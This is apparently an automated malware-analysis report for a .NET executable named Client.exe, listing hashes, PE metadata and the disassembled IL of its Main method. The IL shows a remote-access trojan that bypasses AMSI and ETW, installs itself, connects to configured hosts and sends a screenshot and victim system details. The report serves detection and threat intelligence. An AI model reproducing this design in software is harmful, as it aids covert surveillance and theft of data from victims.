73d400da613771239f4fe533b2edd517
PE Executable | MD5: 73d400da613771239f4fe533b2edd517 | Size: 201.06 KB | application/x-dosexec
Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 73d400da613771239f4fe533b2edd517
|
| Sha1 | 8fbcb8d5fbccd07bd7d4c9a4fc8f458c5a03c2f9
|
| Sha256 | cc76b6eefedd4b5c2d9dfc5e2a243f3a231f0c1d89fe000ee49aa999a63fa631
|
| Sha384 | ee21ddfa309c7f06e5ddb11a4ffe1c4afaefffdc81aee6cb4fa96b33ed1d99f2d0a93dfd549743fab361667e568159f3
|
| Sha512 | 14ae871a865d9272db896d4d040b361770c46f82631716eefd4a769d1a5d9d3579f9790df83be8ed7038e5401dc602208b710427f9ce283e6b848250984ad7bf
|
| SSDeep | 6144:B0YpD8AizH71cV2Lek/mDrdvWtgtT0gRbMNSl:Fg7I2Lek/mDRWtePKO
|
| TLSH | E414E101379C4912D68F8E7C9799E2076674D3B30C97DB4FB88B4DE015813D6AB90EEA
|
PeID
|
Name0 | Value |
|---|---|
| Module Name | Client.exe |
| Full Name | Client.exe |
| EntryPoint | System.Void Client.Program::Main(System.String[]) |
| Scope Name | Client.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Client |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 288 |
| Main Method | System.Void Client.Program::Main(System.String[]) |
| Main IL Instruction Count | 149 |
| Main IL | call System.Void Client.Config::Init() call System.Void Client.Helper.AsmiAndETW::Bypass() ldsfld System.String Client.Config::Install ldstr -r) call System.String Client.Helper.EncryptString::Decode(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0025: ldsfld System.String Client.Config::Mutex call System.Void Client.Helper.Install::Run() ldsfld System.String Client.Config::Mutex call System.Boolean Client.Helper.MutexControl::CreateMutex(System.String) brfalse IL_01A7: leave.s IL_01AC call System.Void Client.Helper.Methods::MaxPriority() call System.Void Client.Helper.Methods::PreventSleep() ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brtrue IL_0198: ldc.i4 200 ldsfld System.String Client.Config::Hosts ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 59 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.0 <null> ldloc.0 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.0 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.2 <null> ldsfld Client.Helper.Client Client.Program::client callvirt System.Void Client.Helper.Client::Disconnect() ldsfld Client.Helper.Client Client.Program::client ldloc.1 <null> ldc.i4.0 <null> ldelem.ref <null> ldloc.2 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.2 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void Client.Helper.Client::Connect(System.String,System.String) ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brfalse IL_0198: ldc.i4 200 ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.PingChecker::.ctor(Client.Helper.Client) stfld Client.Helper.PingChecker Client.Helper.Client::pingChecker ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.LastPing::.ctor(Client.Helper.Client) stfld Client.Helper.LastPing Client.Helper.Client::lastPing ldsfld Client.Helper.Client Client.Program::client ldc.i4.s 14 newarr System.Object dup <null> ldc.i4.0 <null> ldstr gs**)0 call System.String Client.Helper.EncryptString::Decode(System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> call System.Byte[] Client.Helper.Methods::CaptureResizeReduceQuality() stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String Client.Config::Group stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String Client.Config::Hwid stelem.ref <null> dup <null> ldc.i4.4 <null> call System.String System.Environment::get_UserName() ldstr vXv call System.String Client.Helper.EncryptString::Decode(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String Client.Config::Camera stelem.ref <null> dup <null> ldc.i4.6 <null> ldsfld System.String Client.Config::Cpu stelem.ref <null> dup <null> ldc.i4.7 <null> ldsfld System.String Client.Config::Gpu stelem.ref <null> dup <null> ldc.i4.8 <null> ldsfld System.String Client.Config::WindowsVersion stelem.ref <null> dup <null> ldc.i4.s 9 ldsfld System.String Client.Config::AntiVirus stelem.ref <null> dup <null> ldc.i4.s 10 ldsfld System.String Client.Config::Version stelem.ref <null> dup <null> ldc.i4.s 11 ldsfld System.String Client.Config::DataInstall stelem.ref <null> dup <null> ldc.i4.s 12 ldsfld System.String Client.Config::Privilege stelem.ref <null> dup <null> ldc.i4.s 13 call System.String Client.Helper.Methods::GetActiveWindowTitle() stelem.ref <null> call System.Byte[] Leb128.LEB128::Write(System.Object[]) callvirt System.Void Client.Helper.Client::Send(System.Byte[]) ldc.i4 200 call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_003E: ldsfld Client.Helper.Client Client.Program::client leave.s IL_01AC: ret pop <null> leave.s IL_01AC: ret ret <null> |